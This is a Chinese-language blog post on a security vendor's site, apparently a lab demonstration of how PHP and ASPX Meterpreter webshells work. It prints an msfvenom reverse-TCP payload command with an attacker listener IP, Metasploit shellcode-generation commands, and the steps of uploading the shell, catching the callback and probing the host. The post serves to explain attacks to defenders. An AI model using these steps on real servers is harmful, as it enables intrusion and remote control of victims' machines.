网盾安全 - 服务器租用、高防IP、云WAf等

值得信赖的互联网安全服务商,最新动态、新的产品促销活动分享,网络安全动态!

高防IP实测webshell攻击模式

发布时间:2021-01-22 18:32:26      来源:      作者: 阿己

  目前,尽管有很多企业用户会使用到高防IP来防御Wabshell后门,但大多不清楚这种攻击的模式。

  现在我们来看一下具体的操作。
 

  Meterpreter后门

  在metasploit中,有一个名为PHP Meterpreter的payload,利用这个可以创建具有Meterpreter功能的PHP webshell步骤如下所示:

  1、使用msfvenom创建一个webshell.php

  2、上传webshell.php到目标服务器

  3、运行metasploit mulit-handler开始监听

  4、访问webshell.php页面

  5、获得反弹的metasploit shell

  制作PHP Meterpreter

  msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.1.20 -f raw >111.php

  -p:设置payload

  -f:设置输出文件格式

  我在win7上搭建了phpstudy,将文件复制到phpstudy的www目录下,启动msfconsole进行监听,配置以下命令:

  访问该网站,回到MSF下可以看到服务端已经反弹成功,最后使用sysinfo和getuid等命令渗透目标主机。
 

  Aspx Meterpreter后门

  在攻击中使用Aspx Meterpreter后门的步骤与PHP Meterpreter的大概相同。

  调用模块msf5>use windows/shell reverse tcp,查看需要设置的参数,设置好端口和攻击目标主机IP后输入generate -h查看帮助命令。

  生成个版本的shellcode命令:

  generate -f asp生成asp版的shellcode

  generate -f aspx生成aspx版的shellcode

  在这里使用aspx版的shellcode,将内容保存为222.aspx,上传到phpstudy的www目录下,设置监听,最后访问该网站,回到MSF下可以看到服务端已经反弹成功,最后使用sysinfo和getuid等命令渗透目标主机。

 

 

最新动态

为您提供行业资讯、活动公告、产品发布,汇聚前沿流行的新闻动态

加入网盾,开启安全防护

网盾安全 高防服务器、游戏盾、DDoS高防IP、云WAF等多款安全产品

立即体验